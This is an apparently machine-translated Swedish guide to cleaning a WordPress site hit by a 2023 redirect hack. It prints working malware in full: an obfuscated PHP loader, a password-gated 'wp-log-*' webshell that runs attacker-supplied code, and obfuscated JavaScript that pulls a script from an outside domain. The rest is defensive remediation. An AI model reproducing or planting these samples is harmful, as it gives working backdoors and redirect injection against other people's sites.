Fixa Redirect WordPress Hack 2023 (Virus Redirect)

WordPress är definitivt den mest använda plattformen CMS (Content Management System) både för bloggar och nybörjarbutiker på nätet (med WooCommerce-modulen), vilket gör den till den mest riktade mot dataangrepp (hacking). En av de mest använda hackningsoperationerna syftar till att omdirigera den komprometterade webbplatsen till andra webbsidor. Redirect WordPress Hack 2023 är en relativt ny skadlig programvara som har effekten att omdirigera hela webbplatsen till spam-webbsidor eller som i sin tur kan infektera användarnas datorer.

innehåll

Om din webbplats som utvecklats på WordPress omdirigeras till en annan webbplats, är den troligen offer för det redan kända omdirigeringshacket.

I den här handledningen hittar du nödvändig information och användbara tips genom vilka du kan avvirusa en webbplats som är infekterad med en omdirigering WordPress Hack (Virus Redirect). Genom kommentarerna kan du få ytterligare information eller be om hjälp.

Virusdetektering som omdirigerar WordPress-webbplatser

En plötslig och omotiverad minskning av webbplatstrafiken, en minskning av antalet beställningar (när det gäller nätbutiker) eller i annonsintäkter är de första tecknen på att något är fel. Upptäckt “Redirect WordPress Hack 2023” (Virus Redirect) kan också göras “visuell” när du öppnar webbplatsen och omdirigeras till en annan webbsida.

Av erfarenhet är det mesta av skadlig programvara på webben kompatibla med webbläsare: Chrome, Firefox, Edge, Opera. Om du är en Mac-användare är dessa virus inte särskilt synliga i webbläsaren Safari. Safaris säkerhetssystem blockerar tyst dessa skadliga skript.

Vad du ska göra om du har en webbplats infekterad med Redirect WordPress Hack

Jag hoppas att det första steget inte är att få panik eller ta bort webbplatsen. Inte ens infekterade filer eller virusfiler bör först tas bort. De innehåller värdefull information som kan hjälpa dig att förstå var säkerhetsintrånget finns och vad som påverkade viruset. Modus operandi.

Stäng webbplatsen för allmänheten.

Hur stänger man en viruswebbplats för besökare? Det enklaste är att använda DNS-hanteraren och radera dess IP för “En” (domännamn) eller definiera en icke-existerande IP för den. Således kommer webbplatsbesökare att skyddas från detta WordPress-omdirigeringshack som kan leda dem till virus- eller SPAM-webbsidor.

Om du använder CloudFlare som DNS-hanterare loggar du in på ditt konto och raderar DNS-poster “A” för domännamnet. Således kommer domänen som påverkas av viruset att förbli utan en IP och inte längre kunna nås från Internet.

Kopiera webbplatsens IP och gör det “rutt” så att bara du kan komma åt den. Från din dator.

Hur ändrar du den verkliga IP-adressen för en webbplats på Windows-datorer?

Metoden används ofta för att blockera åtkomst till vissa webbplatser genom att redigera filen “värdar”.

1. Öppna Anteckningar eller annan textredigerare (med administratörsrättigheter) och redigera filen “hosts“. Den ligger i:

C:\Windows\System32\drivers\etc\hosts

2. I filen “värdar” tillägga “rutt” till den verkliga IP-adressen för din webbplats. IP raderad ovan från DNS-hanteraren.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

3. Spara filen och gå till webbplatsen i webbläsaren.

Om webbplatsen inte öppnas och du inte har gjort något fel i filen “värdar”, är det troligen en DNS-cache.

För att rensa DNS-cachen på ett Windows-operativsystem, öppna Kommandotolken, där du kör kommandot:

ipconfig /flushdns

Hur ändrar du den verkliga IP-adressen för en webbplats på Mac/MacBook-datorer?

För Mac-användare är det något enklare att ändra den verkliga IP-adressen för en webbplats.

1. Öppna verktyget Terminal.

2. Kör kommandoraden (kräver systemlösenord för att köra):

sudo nano /etc/hosts

3. Precis som för Windows-datorer, lägg till domänens riktiga IP.

IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld

4. Spara ändringarna. Ctrl+X (y).

Efter att du gjorde det “rutt”, du är den enda personen som kan komma åt den infekterade webbplatsen med Redirect WordPress Hack.

Fullständig backup-webbplats – Filer och databas

Även om den är infekterad med “omdirigera WordPress-hack”, är rekommendationen att göra en allmän säkerhetskopia av hela webbplatsen. Filer och databas. Eventuellt kan du också spara en lokal kopia av båda filerna från public / public_html samt databasen.

Identifiering av virusanvända filer och de som modifierats av Redirect WordPress Hack 2023

De huvudsakliga målfilerna för WordPress Jag är index.php (i roten), header.php, index.php och footer.php av det aktiva WordPress-temat. Kontrollera dessa filer manuellt och identifiera skadlig kod eller ett skadligt skript.

År 2023, ett virus av typen “Omdirigera WordPress-hack” införa index.php en kod av formuläret:

(Jag rekommenderar inte att du kör dessa koder!)

<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20='            TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>

Avkodad, det här skript skadlig kod det är i grunden konsekvensen av att WordPress-webbplatsen är infekterad. Det är inte skriptet bakom skadlig programvara, det är skriptet som gör det möjligt att omdirigera den infekterade webbsidan. Om vi avkodar skriptet ovan får vi:

<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>

För att identifiera alla filer på servern som innehåller denna kod är det bra att ha åtkomst SSH till servern för att köra filkontroll och hantering av kommandorader på Linux.

Släkt: Hur du tar reda på om din blogg är infekterad eller inte, med hjälp av Google Sök. (WordPress Virus)

Nedan finns två kommandon som definitivt är användbara för att identifiera nyligen modifierade filer och filer som innehåller en viss kod (sträng).

Hur ser du PHP-filer ändrade under de senaste 24 timmarna eller annan tidsram på Linux?

Kommando “find” det är mycket enkelt att använda och tillåter anpassning för att ställa in tidsperioden, sökvägen där sökningen görs och typen av filer.

find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"

I utgången kommer du att få information om datum och tid då filen ändrades, skriv-/läs-/körrättigheterna (chmod) och vilken grupp/användare den tillhör.

Om du vill kontrollera fler dagar sedan, ändra värdet “-mtime -1” eller använda “-mmin -360” i minuter (6 timmar).

Hur söker man efter en kod (sträng) i PHP, Java-filer?

Kommandorad “hitta” som du kan använda för att snabbt hitta alla PHP- eller Java-filer som innehåller en viss kod är följande:

find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +

Kommandot kommer att söka och visa filerna .php och .js som innehåller “uJjBRODYsU“.

Med hjälp av de två kommandona ovan kommer du mycket enkelt att ta reda på vilka filer som nyligen har ändrats och vilka som innehåller skadlig kod.

Tar bort skadlig kod från modifierade filer utan att kompromissa med rätt kod. I mitt scenario placerades skadlig programvara innan den öppnades <head>.

När du kör det första kommandot “hitta” det är mycket möjligt att du också kommer att upptäcka nya filer på servern, som inte är WordPresss och inte lagts där av dig. Filer som tillhör Redirect WordPress Hack virus.

I scenariot jag undersökte dök shapefiler upp på servern “wp-log-nOXdgD.php“. Det här är filer “generation” som också innehåller skadlig kod som används av omdirigeringsviruset.

<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}

Syftet med typfiler “wp-log-*” är att sprida omdirigeringshackviruset till andra webbplatser som finns på servern. Det är en typ av skadlig kod “webshell” består av en grundläggande avsnitt (där vissa krypterade variabler är definierade) och o utförande avsnitt genom vilken angriparen försöker ladda och köra en skadlig kod på systemet.

Om det finns en variabel POST namnges ‘bh‘ och dess krypterade värde MD5 är lika med “8f1f964a4b4d8d1ac3f0386693d28d03“, då visas skriptet för att skriva det krypterade innehållet base64 av en annan namngiven variabel ‘b3‘ till en temporär fil och försöker sedan inkludera denna temporära fil.

Om det finns en variabel POST eller GET namnges ‘tick', kommer skriptet att svara med värdet MD5 av strängen “885“.

För att identifiera alla filer på servern som innehåller den här koden, välj en sträng som är gemensam och kör sedan kommandot de “find” (liknande den ovan). Ta bort alla filer som innehåller denna skadliga kod.

Säkerhetssårbarhet utnyttjas av omdirigering av WordPress-hack

Troligtvis kommer detta omdirigeringsvirus via utnyttja WordPress-adminanvändaren eller genom att identifiera en sårbart plugin som gör det möjligt att lägga till användare med administratörsbehörighet.

För de flesta webbplatser byggda på WordPress-plattformen är det möjligt redigera tema- eller plugin-filerfrån administrationsgränssnittet (Dashboard). Således kan en illvillig person lägga till skadlig kod till temafilerna för att generera skripten som visas ovan.

Ett exempel på sådan skadlig kod är detta:

<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>

JavaScript identifieras i WordPress-temahuvudet, omedelbart efter att taggen har öppnats <head>.

Det är ganska svårt att dechiffrera detta JavaScript, men det är uppenbart att det frågar efter en annan webbadress varifrån det med största sannolikhet hämtar andra skript för att skapa filerna “wp-log-*” som vi pratade om ovan.

Hitta och ta bort den här koden från alla filer PHP påverkad.

Såvitt jag kunde se var den här koden manuellt lagt till av en ny användare med administrativa rättigheter.

Så för att förhindra tillägg av skadlig kod från instrumentpanelen är det bäst att inaktivera alternativet att redigera WordPress-teman / plugins från instrumentpanelen.

Redigera filen wp-config.php och lägg till raderna:

define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);

När du har gjort den här ändringen kommer ingen WordPress-användare att kunna redigera filer från Dashboard.

Kontrollera användare med administratörsroll

Nedan finns en SQL-fråga som du kan använda för att söka efter administratörsanvändare i WordPress-plattformen:

SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'

Denna fråga returnerar alla användare i tabellen wp_users vem som tilldelade administratörsrollen. Frågan görs även för tabellen wp_usermeta för att söka i meta ‘wp_capabilities', som innehåller information om användarroller.

En annan metod är att identifiera dem från: Dashboard → Users → All Users → Administrator. Det finns dock metoder som gör att en användare kan döljas i instrumentpanelen. Så det bästa sättet att se användare “Administratör” från WordPress är SQL-kommandot ovan.

I mitt fall identifierade jag användaren med namn i databasen “wp-import-user“. Ganska suggestivt.

Härifrån kan du också se datum och tid när WordPress-användaren skapades. Användar-ID är också mycket viktigt eftersom det söker i serverloggarna. På så sätt kan du se all aktivitet för denna användare.

Ta bort användare med administratörsroll vilket du inte vet alltså ändra lösenord till alla administrativa användare. Redaktör, författare, administratör.

Ändra lösenordet för SQL-databasanvändaren av den berörda webbplatsen.

Efter att ha tagit dessa steg kan webbplatsen startas om för alla användare.

Tänk dock på att det jag presenterade ovan är ett av kanske tusentals scenarier där en webbplats är infekterad med Redirect WordPress Hack 2023.

Om din webbplats har blivit infekterad och du behöver hjälp eller om du har några frågor är kommentarsektionen öppen.